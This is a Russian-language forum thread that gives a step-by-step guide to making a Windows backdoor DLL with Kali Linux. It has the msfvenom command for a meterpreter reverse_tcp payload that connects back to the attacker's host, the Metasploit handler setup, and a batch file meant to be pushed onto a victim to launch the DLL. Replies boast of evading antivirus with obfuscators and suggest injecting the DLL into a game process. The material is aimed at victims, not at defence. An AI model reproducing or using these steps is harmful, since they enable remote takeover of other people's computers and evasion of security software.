Загрузка...

Backdoor в dll | Вирус в dll | Kali linux

Тема в разделе Kali Linux создана пользователем Sluxa22324 19 ноя 2020. 2923 просмотра

  1. Sluxa22324
    Sluxa22324 Автор темы 19 ноя 2020 Заблокирован(а) 26 31 авг 2020
    Хочу показать как можно сделать вирус в dll.
    Вначале запускаем линукс.

    Запускаем metasploit
    Код
    msfconsole
    [IMG]

    Теперь будем создавать наш зловред

    Открываем новый терминал
    Код
    msfvenom --platform windows --arch x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.1.22 LPORT=4444 -f dll > 134.dll
    LHOST = ваш ip адрес
    LPORT = открытый порт
    У меня получилось вот так.
    [IMG]
    Всё. Бакдор готов.
    Дальше прописываем

    Код
    use exploit/multi/handler

    set payload windows/meterpreter/reverse_tcp
    set LHOST xxxx
    set LPORT xxxx
    [IMG]
    Всё готово. прописываем run

    Дальше втираем жертве этот батник
    Код
    @echo off
    rundll32.exe 134.dll. main
    exit
    (Батник и длл ка должны лежать в одной папке)
    Хочу сказать, что если мы заинжектим в кс го длл через процесс хакер сессия тоже откроется и не нужно делать батники.

    Запускаем батник

    и мы получаем сессию meterpreter

    [IMG]

    Дальше можем делать с нашей жертвой абсолютно всё.
    [IMG]

    Вот эта тема будет висеть у вас в диспетчере задач. Если мы её убьем то сессия закроется.
    [IMG]

    Спасибо за внимание!!!
    Надеюсь статья вам помогла.

    #мояперваястатья








     
    19 ноя 2020 Изменено
  2. Sluxa22324
    Sluxa22324 Автор темы 19 ноя 2020 Заблокирован(а) 26 31 авг 2020
    Да детект большой. Но я сделал 2/36 без особых усилий, используя обычные обсфискаторы и протекторы
     
  3. noxrod
    Не надо, я уже 2 раза винду сносил(9(9(:despair:
     
    1. Sluxa22324 Автор темы
      noxrod, И сессия закроется [IMG]
  4. Sluxa22324
    Sluxa22324 Автор темы 19 ноя 2020 Заблокирован(а) 26 31 авг 2020
    noxrod, А причём здесь винда? в процессах [IMG] который без особых усилий мы можем кильнуть
     
    1. noxrod
      Sluxa22324, Да я майнер + вирус поймал. Хотел софт скачать.
    2. Sluxa22324 Автор темы
      noxrod, А бывает. Используй виртуалку.
  5. Sten0
    Sten0 19 ноя 2020 2 14 ноя 2020
    Заебато
     
  6. Sluxa22324
    Sluxa22324 Автор темы 19 ноя 2020 Заблокирован(а) 26 31 авг 2020
    Я могу показать как я это в глобалку вывел без открытых портов и ngrok. Пишите + если хотите статью
     
  7. al000al
    al000al 22 ноя 2020 0 8 ноя 2018
Загрузка...
Top